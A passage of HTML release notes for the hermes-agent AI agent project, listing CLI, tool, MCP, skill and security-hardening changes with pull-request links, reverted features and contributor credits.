<li><code>hermes serve</code> is a true headless backend (no web UI build/mount) (<a href="https://github.com/NousResearch/hermes-agent/pull/55923" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55923/hovercard">#55923</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>🧰 CLI &amp; TUI</h2>
<ul>
<li><code>/subscription</code> + <code>/topup</code> terminal billing (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/51639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51639/hovercard">#51639</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
<li><strong><code>/model --once</code></strong> — one-turn model override that reverts automatically (<a href="https://github.com/NousResearch/hermes-agent/pull/67113" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67113/hovercard">#67113</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, salvaging <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496326587" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/29923" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29923/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/29923">#29923</a>)</li>
<li><strong>Stacked slash-skill invocations</strong> — <code>/skill-a /skill-b do XYZ</code> loads both skills in order (Claude Code port), with autocomplete + ghost text (<a href="https://github.com/NousResearch/hermes-agent/pull/57987" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57987/hovercard">#57987</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58763" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58763/hovercard">#58763</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><code>--safe-mode</code> troubleshooting flag; uninstall dry-run; TLS failures fail fast with fix hints; <code>/compact</code> alias + preview flags; pip/Homebrew installs warned unsupported (<a href="https://github.com/NousResearch/hermes-agent/pull/45300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45300/hovercard">#45300</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60111" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60111/hovercard">#60111</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57992" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57992/hovercard">#57992</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57029" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57029/hovercard">#57029</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57225/hovercard">#57225</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>TUI: model picker refresh support; custom skill bundles dispatched as agent turns; banner sizes skills display to terminal width (<a href="https://github.com/NousResearch/hermes-agent/pull/59782" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59782/hovercard">#59782</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62859/hovercard">#62859</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adolanium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adolanium">@Adolanium</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40624/hovercard">#40624</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Hermes Console REPL + perf follow-ups; <code>hermes curator usage</code> all-skills view; entry-point plugins surfaced in <code>hermes plugins list</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/57781" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57781/hovercard">#57781</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36727" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36727/hovercard">#36727</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40623" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40623/hovercard">#40623</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System, Skills &amp; MCP</h2>
<ul>
<li>MCP: <code>mcp__server__tool</code> naming convention; server log notifications surfaced in agent.log; hosted OAuth completed across Dashboard + Desktop; configurable <code>redirect_uri</code>/<code>redirect_host</code> for proxied/WAF setups; OAuth callback port races closed; Blender added to the MCP catalog with a curated 4-tool default (<a href="https://github.com/NousResearch/hermes-agent/pull/52750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52750/hovercard">#52750</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57416/hovercard">#57416</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66151" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66151/hovercard">#66151</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65610/hovercard">#65610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65622" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65622/hovercard">#65622</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64463" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64463/hovercard">#64463</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Skills: <code>security/unbroker</code> (autonomous data-broker removal) + blind opt-out hardening; <code>unreal-mcp</code> companion skill; blender-mcp reworked around the catalog entry; humanizer pattern expansion; <code>mcp-oauth-remote-gateway</code> optional skill (<a href="https://github.com/NousResearch/hermes-agent/pull/57438" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57438/hovercard">#57438</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57902" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57902/hovercard">#57902</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65989" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65989/hovercard">#65989</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64715" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64715/hovercard">#64715</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65066" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65066/hovercard">#65066</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65486" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65486/hovercard">#65486</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Browser: full snapshots stored on truncation, eval denylist opt-in; computer_use follows cua-driver's verify→escalate ladder (<a href="https://github.com/NousResearch/hermes-agent/pull/65923" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65923/hovercard">#65923</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67123" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67123/hovercard">#67123</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Kanban: modal create-task dialog + editable board project directory; Done-card results made obvious; grab-to-pan board scrolling; attachment toolset + CLI with SSRF-guarded URL fetch; project directory captured at board creation (<a href="https://github.com/NousResearch/hermes-agent/pull/66333" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66333/hovercard">#66333</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63638" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63638/hovercard">#63638</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60226/hovercard">#60226</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65698" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65698/hovercard">#65698</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63249" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63249/hovercard">#63249</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Cron: durable execution audit history; one-shot stale-removal race fixed; run-claim TTL derived from HERMES_CRON_TIMEOUT (<a href="https://github.com/NousResearch/hermes-agent/pull/61791" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61791/hovercard">#61791</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62014" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62014/hovercard">#62014</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59567" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59567/hovercard">#59567</a>)</li>
<li>mem0: self-hosted dashboard backend + recall tuning + setup-wizard mode (<a href="https://github.com/NousResearch/hermes-agent/pull/56943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56943/hovercard">#56943</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60494/hovercard">#60494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Image gen: Codex image inputs; unsupported Codex image accounts classified; tool args recursively normalized by schema (cline port) (<a href="https://github.com/NousResearch/hermes-agent/pull/57017" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57017/hovercard">#57017</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63627" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63627/hovercard">#63627</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52220/hovercard">#52220</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li>Vertex: credential/project/region resolution through the profile secret scope; <code>VERTEX_CREDENTIALS_PATH</code>/<code>GOOGLE_APPLICATION_CREDENTIALS</code> stripped from subprocess env (<a href="https://github.com/NousResearch/hermes-agent/pull/56680" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56680/hovercard">#56680</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56582/hovercard">#56582</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>)</li>
<li>Six P1 hardening PRs salvaged in one pass — browser guards, MEDIA anchoring, .env lockdown, delegate ACP transport (<a href="https://github.com/NousResearch/hermes-agent/pull/57660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57660/hovercard">#57660</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Media/vision/image-gen local-file reads routed through the shared credential-read guard; native image routing guarded by file-safety policy; unified image-source resolver + terminal-backend confinement (<a href="https://github.com/NousResearch/hermes-agent/pull/58709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58709/hovercard">#58709</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58752/hovercard">#58752</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57890" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57890/hovercard">#57890</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Webhook body-cap sweep: explicit <code>client_max_size</code> on 3 uncapped aiohttp servers + completion sweep; Raft chunked-request body limit; timestamp-bound V2 webhook signatures (<a href="https://github.com/NousResearch/hermes-agent/pull/59180" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59180/hovercard">#59180</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59215/hovercard">#59215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58902" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58902/hovercard">#58902</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58508/hovercard">#58508</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>)</li>
<li>Redaction: Fireworks token prefixes + Telegram transport errors; env-lookup false positives fixed for KEY=value and JSON/YAML config fields; bot tokens scrubbed from Telegram connect/send errors (<a href="https://github.com/NousResearch/hermes-agent/pull/58501" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58501/hovercard">#58501</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58534" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58534/hovercard">#58534</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58915" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58915/hovercard">#58915</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58893" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58893/hovercard">#58893</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>computer-use: subprocess env sanitized across all five cua-driver spawn sites (<a href="https://github.com/NousResearch/hermes-agent/pull/58889" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58889/hovercard">#58889</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59165" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59165/hovercard">#59165</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Dashboard: managed-files credential guard widened past .env + dir-tree gap closed; OAuth token TOCTOU closed with atomic 0o600 writes; stale dashboards can't recreate deleted profiles (<a href="https://github.com/NousResearch/hermes-agent/pull/58222" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58222/hovercard">#58222</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60236/hovercard">#60236</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49435" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49435/hovercard">#49435</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>)</li>
<li>CI: untrusted refs passed through env, not <code>run:</code> interpolation; JS/TS tests wired into CI with source-regex tests banned; js-autofix pushes via PR instead of direct-to-main (<a href="https://github.com/NousResearch/hermes-agent/pull/57842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57842/hovercard">#57842</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60707" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60707/hovercard">#60707</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65186/hovercard">#65186</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Docker: terminal network toggle with full-path coverage; Git Bash Mandatory-ASLR install failures detected; Windows updater console hidden during handoff (<a href="https://github.com/NousResearch/hermes-agent/pull/59149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59149/hovercard">#59149</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64651" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64651/hovercard">#64651</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66040" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66040/hovercard">#66040</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>)</li>
<li>Anthropic: request-local clients so the stale/interrupt watchdog never corrupts SQLite; per-profile OAuth file; OAuth login 429 fixed (UA must not be claude-code/) (<a href="https://github.com/NousResearch/hermes-agent/pull/67238" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67238/hovercard">#67238</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59339" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59339/hovercard">#59339</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58178" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58178/hovercard">#58178</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Gateway/agent: tool_call_id deduplicated across pre-API sanitizers; background review inherits parent reasoning_config for Anthropic cache parity; <code>/new</code> memory extraction moved off the command path (<a href="https://github.com/NousResearch/hermes-agent/pull/58350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58350/hovercard">#58350</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64379/hovercard">#64379</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61139" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61139/hovercard">#61139</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🔁 Reverted in this window (for the record)</h2>
<ul>
<li>iron-proxy credential-injection egress firewall (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499336733" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/30179" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30179/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/30179">#30179</a> → reverted in <a href="https://github.com/NousResearch/hermes-agent/pull/58489" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58489/hovercard">#58489</a>) — not shipping in this release</li>
<li>dynamic-workflow orchestration skill (landed, then reverted) — not shipping</li>
<li>memory provider-actions extension point (landed, then reverted) — not shipping</li>
<li>Note: the plugin <code>pre_tool_call</code> approve escalation was reverted mid-window but <strong>re-landed</strong> in <a href="https://github.com/NousResearch/hermes-agent/pull/60504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60504/hovercard">#60504</a> and ships in this release.</li>
</ul>
<h2>👥 Contributors</h2>
<p><strong>450+ people</strong> contributed to this release (via commits, co-author trailers, and salvaged PRs) — the biggest contributor window yet. Thank you, all of you.</p>
<h3>Core team</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a> — release lead; TTFT perf wave, delivery + delegation durability, smart approvals, SecretSource, gateway multiplex + profile routing, sessions export, security round, and a ~290-PR community salvage burn</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a> — desktop app (the speed wave, layout-tree shell, Capabilities page, session colors, vibe reactions, TUI incremental markdown, perf harness)</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> — GPT-5.6 end-to-end, DeepInfra + Upstage Solar providers, perf cluster, compression integrity, mem0, dashboard guards</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a> — CI overhaul (JS/TS tests wired in, autofix-via-PR, python speedups), desktop keybinds/worktrees/status indicators, full desktop TypeScript conversion</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> — relay OIDC provisioning, gateway multiplex override, Nous auth self-heal, hosted MCP OAuth groundwork</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a> — terminal billing (<code>/subscription</code>, <code>/topup</code>), desktop billing tab</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a> — desktop provider/model UX, TUI model picker refresh, Windows install/updater hardening</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a> — desktop custom endpoint settings</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a> — unbroker + unreal-mcp skills, humanizer expansion</li>
</ul>
<h3>Top community contributors</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a> — security hardening: Vertex credential/project/region scoping through the profile secret scope, subprocess env stripping, Raft chunked-request body limits</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HexLab98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HexLab98">@HexLab98</a> — 11 fixes across MCP capability gating, Windows installer PATH, desktop cron editing, gateway systemd warnings</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UnathiCodex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UnathiCodex">@UnathiCodex</a> — desktop stability: zoom across display moves, LaTeX rendering, resume-stall and runtime-readiness fixes</li>
